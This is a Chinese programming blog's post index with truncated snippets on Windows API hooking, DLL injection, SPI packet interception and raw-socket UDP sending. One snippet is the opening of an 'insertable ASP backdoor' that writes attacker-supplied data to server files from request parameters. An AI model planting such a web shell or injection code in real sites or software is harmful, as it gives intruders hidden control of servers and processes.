- 博客(24)
- 资源 (3)
- 收藏
- 关注
RSS订阅原创 centos8.0 安装nodejs和mysql环境
第一步,更新yum:yum update第二步,安装nodejsyum module list nodejs安装默认的版本sudo yum -y install nodejs安装完成后可以查看版本:node -vnpm -v第三步,安装pm2npm install pm2 -gpm2常用命令:#启动任务pm2 start main.js --name maokai#查看所有任务pm2 list#停止指定id的任务pm2 de.
2020-11-14 19:16:10
836
转载 用 Thunk 实现 COM 的挂钩
COM 的挂钩其实已经是一个很古老的话题了,其核心技术就是替换 COM 对象虚表中相应位置的函数指针,从而达到挂钩的效果。顺便说一句,这个方法和内核的 SSDT 挂钩是十分类似的。其相应的实现代码也十分简单,如下所示:typedef struct _tagHookHelper { PVOID* vptr; } HOOKHELPER, *PHOOKHELPER;
2009-11-01 18:21:00
525
原创 和路径相关的API
需要头文件:shlwapi.hBOOL PathFileExists(LPCTSTR lpszPath)功能:检查文件/路径是否存在LPTSTR PathFindFileName(LPCTSTR pPath)功能:获得路径中的文件名例如: PathFileFileName( “c://Program Files//File.txt” ) = “File.txt”。如果路径中不包含文件名,则返回
2009-09-26 01:14:00
747
原创 API HOOK框架
采用微软的 detours1.5 为内核, detours.h和detours.lib自己到网上下。代码如下: MsHookApi.h/****************************************************************************API HOOK 采用微软的Detours1.5为内核使用方法:参照例子,首先使
2009-02-08 19:04:00
1208
2
转载 非同步HASH结构的简单实现
根据不同的key用hash函数计算出在数组中的位置,数组中保存的是一个链表结构的结构,不同key在hash值相同的情况下,可以用链表来控制在内存中的位置。 hashtable.h文件:/***************************************** * FILE : hashtable.h * DATE : 2008/01/06 *
2008-10-22 11:51:00
729
原创 让BCB的工程具有XP主题风格
建立两个文件,一个配置文件themed.manifest:xml version="1.0" encoding="utf-8" standalone="yes"?> assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">assemblyIdentity name="[email protected]"
2007-08-08 14:54:00
801
原创 ANSI 和 Unicode 字符串函数补充
操作 ANSI串函数 Unicode串函数 Length strlen wcslen Concatena
2007-05-12 02:01:00
1153
原创 MS的detours库 API hook
#include "stdafx.h"#include "detours.h"#include stdio.h>#pragma comment(lib, "detours.lib")WCHAR s_wzDllPath[256];char s_szDllPath[256]; extern "C"...{DETOUR_TRAMPOLINE(BOOL WINAPI Real_Cre
2007-04-01 02:34:00
2879
1
原创 ANSI 和 Unicode 字符函数对照表
宽字符处理函数函数与普通函数对照表 字符分类: 宽字符函数普通C函数描述 iswalnum() isalnum() 测试字符是否为数字或字母 iswalpha() isalpha() 测试字符是否是字母 iswcntrl() iscntrl() 测试字符是否是控制符 iswdigit() isdigit() 测试字符是否为数字 iswgraph() isgraph() 测试字符是否是可见
2007-04-01 02:28:00
2864
1
转载 Overlapped模型深入分析
Overlapped模型深入分析(原理篇) Overlapped I/O模型深入分析简述: Overlapped I/O也称Asynchronous I/O,异步I/O模型。异步I/O和同步I/O不同,同步I/O时,程序被挂起,一直到I/O处理完,程序才能获得控制。异步I/O,调用一个函数告诉OS,进行I/O操作,不等I/O结束就立即返回,继续程序执行,
2007-03-23 23:01:00
1006
原创 R3模式下禁用启用网卡
#include stdio.h> #include tchar.h> #include windows.h> #include setupapi.h>#pragma comment(lib, "setupapi.lib")HDEVINFO hDevInfo = 0;BOOL StateChange(DWORD NewState, DWORD SelectedItem, HDEV
2007-03-07 04:44:00
820
原创 挂起和恢复一个进程
用到了NTDLL中的函数typedef DWORD(WINAPI *PFSuspendProcess)(HANDLE hProcess);typedef DWORD(WINAPI *PFResumeProcess)(HANDLE hProcess);int main(int argc, char* argv[]){ PFSuspendProcess SuspendProcess; PF
2007-02-21 10:03:00
1272
原创 通过原始套接字发送UDP数据(IKEEPER换机)
#include #include #include #pragma pack (push ,1)typedef struct _iphdr //定义IP首部{ unsigned char h_lenver; //4位首部长度+4位IP版本号 unsigned char tos; //8位服务类型TOS unsigned short total_len; //16位总长度(字节)
2006-12-22 18:51:00
1870
转载 一种全新的软件界面设计方法 (一)
一种全新的软件界面设计方法撰文:Aweay下载本文实例代码(代码已更新2004.12.10)关键字:COM MySpy IE SetUIHanlder IcustomDoc IDocHostUIHandler GetExternal 前言作者在解决各种问题的时候喜欢首先使用C++ Builder来尝试,这篇文章也是这样,但这并不影响其他开发工具的使用者阅读,因为这都是微软的
2005-10-07 08:48:00
1478
转载 模拟WSockExpert,拦截API来截获封包
转载自 zwell 的专栏:不知道大家用过WSockExpert没有, 它可以用来截获指定进程网络数据的传输.前面我还以为它是通过实时远程注入DLL来更改IAT. 不过后来发现在程序一运行时,它就已经将DLL插入所有进程了,这个跟冰哥写的那个模拟SOCKCAP的程序很相似.似乎是将DLL注入所有进程, 不过再想一下, 如果是这样的话,那么后来启动的程序应该不会被注入DLL(除非用定时^_^,这
2005-09-14 10:55:00
2672
原创 利用WMI获取和更新网络设置(VBS脚本)
On Error Resume NextSet objWMIService = GetObject("winmgmts://./root/cimv2")Set colNetAdapters = objWMIService.ExecQuery ("Select * from Win32_NetworkAdapterConfiguration where IPEnabled=TRUE")For Eac
2005-06-20 11:14:00
1755
原创 插入型ASP后门代码
dim objFSO dim fdata dim objCountFile on error resume next Set objFSO = Server.CreateObject("Scripting.FileSystemObject") if Trim(request("syfdpath"))fdata = request("cyfddata") Set objCountFile=objFS
2005-06-07 10:21:00
1233
原创 SPI拦截网络封包(EXE安装篇)
//以下是安装类/*InsPkgCls.h*/#include #include #include #define MY_DLL_NAME _T("spidll.dll")#define MY_DLL_PATH _T("//spidll.dll")#define MY_VAR_PATH _T("//myvar.dat")#define REG_INSTALL_KEY _T("SYSTEM//
2005-03-13 08:44:00
2276
原创 SPI拦截网络封包(DLL篇)
#include #include #include #pragma comment(lib, "ws2_32.lib")//// 用来保存系统服务提供者路径信息的自定义注册表键值//#define REG_INSTALL_KEY "SYSTEM//CurrentControlSet//Services//WinSock2//MySPI"//// 全局变量,用来保存系统服务提供者30个服务函数指针
2005-03-13 08:39:00
3418
原创 CreateProcess插入DLL的方法 (EXE篇)
#include #include #pragma comment(lib, "ImageHlp.lib")#pragma pack (push ,1)typedef struct{ BYTE int_PUSHAD; BYTE int_PUSH; DWORD push_Value; BYTE int_MOVEAX; DWORD eax_Value; WORD call_eax; BYTE jmp_
2005-03-13 08:29:00
1768
原创 通过CreateProcess插入DLL的方法 (DLL篇)
#include #include #include #pragma comment(lib, "ImageHlp.lib")#pragma pack (push ,1) //以下结构字节对齐typedef struct{ BYTE int_PUSHAD; BYTE int_PUSH; DWORD push_Value; BYTE int_MOVEAX; DWORD eax_Value;
2005-03-13 08:25:00
2011
原创 拦截API(修改函数地址方法)
#include #include #include #include #include #pragma comment(lib, "ImageHlp.lib")#define HookExceptionNo 5BOOL Init();BOOL SysVer = true;HMODULE g_hModule;DWORD dwIdOld, dwIdNew;//####################
2005-03-13 08:11:00
1912
Detours1.5 For BCB6
2011-07-07
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人